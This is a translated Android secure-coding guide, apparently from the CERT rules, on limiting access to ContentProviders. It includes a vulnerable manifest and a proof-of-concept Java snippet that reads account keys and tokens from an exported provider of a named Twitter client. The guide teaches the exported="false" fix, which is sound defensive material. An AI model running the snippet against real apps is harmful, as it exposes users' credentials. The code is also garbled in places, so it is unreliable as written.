"Secure programming in the Android platform" の#01-limits the accessibility of app-sensitive ContentProvider

Source: Internet
Author: User

This article is translated from Https://www.securecoding.cert.org/confluence/display/java/DRD01-J.+Limit+the+accessibility+of+an +app%27s+sensitive+content+provider, there are additional deletions.


The ContentProvider class provides a mechanism for managing and sharing data with other apps. When sharing provider data with other apps, you must carefully implement access control to prevent unauthorized access to sensitive data.

There are three ways to restrict access to ContentProvider:

Public

Private

Restricted Access


[Public]

Declaring the android:exported attribute in the Androidmanifest.xml file, ContentProvider can be made public to other apps, Android API level 16 Earlier, ContentProvider is public by default unless explicitly declared android:exported= "false", for example:

<provider android:exported= "true" Android:name= "Mycontentprovider" android:authorities= " Com.example.mycontentprovider "/>

If ContentProvider is set to public, the data stored in ContentProvider can be accessed by other apps. Therefore, the design must ensure that only non-confidential information is disclosed.


[Private]

Declare the Android:exported property in the Androidmanifest.xml file, and you can set the ContentProvider to private. From Android API level 17 and later, ContentProvider is private by default and does not need to be explicitly declared, for example:

<provider android:exported= "false" Android:name= "Mycontentprovider" android:authorities= " Com.example.mycontentprovider "/>

If ContentProvider does not need to share data with other apps, declare android:exported= "false" in the manifest file, noting that at API Level 8 and earlier, Even if you explicitly declare android:exported= "false", the corresponding contentprovider can be accessed by other apps.


[Restricted Access]

Not to be continued


[Code examples that do not meet security requirements]

Movatwitouch, a Twitter client that uses ContentProvider to manage Twitter users ' key,secret and access tokens, but this contentprovider is public, This makes it possible for other apps installed on the same phone to get these sensitive information.

The provider declaration in the following androidmanifest.xml file does not specify the android:exported attribute, so the ContentProvider is public before API level 16.

<provider android:name= ". Content. Accountprovider "android:authorities=" Jp.co.vulnerable.accountprovider "/>


[Proof of concept]

The following code shows how the public's ContentProvider vulnerability can be exploited

Check whether Movatwi is installed.try {applicationinfo info = Getpackagemanager (). Getapplicationinfo ("Jp.co.vulnera Ble ", 0); [CJL5]}  catch (Namenotfoundexception e) {LOG.W (TAG, "the app is not installed."); return;} Extract account data through content Provideruri URI = uri.parse ("Content://jp.co.vulnerable.accountprovider"); Cursor cur = getcontentresolver (). Query (URI, NULL, NULL, NULL, or NULL); [CJL6]  StringBuilder sb = new StringBuilder (); if (cur! = null) {int RI = 0;    while (Cur.movetonext ()) {++ri;    LOG.I (TAG, String.Format ("row[%d]:", RI));    Sb.setlength (0);      for (int i = 0; i < Cur.getcolumncount (); ++i) {String column = Cur.getcolumnname (i);      String value = cur.getstring (i);      if (value = null) {value = Value.replaceall ("[\ r \ n]", "");    } log.i (TAG, String.Format ("\t%s:\t%s", column, value)); }}} else {log.i (TAG, "Can ' t get the app information.");}


[Solutions]

In the Androidmanifest.xml file, explicitly declare ContentProvider as

Android:exported= "false" <provider android:name= ". Content. Accountprovider "android:exported=" false "android:authorities=" Jp.co.vulnerable.accountprovider "/>

--Welcome reprint , please specify the source   http://blog.csdn.net/asce1885 &NBSP; do not use for commercial purposes without my consent--

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.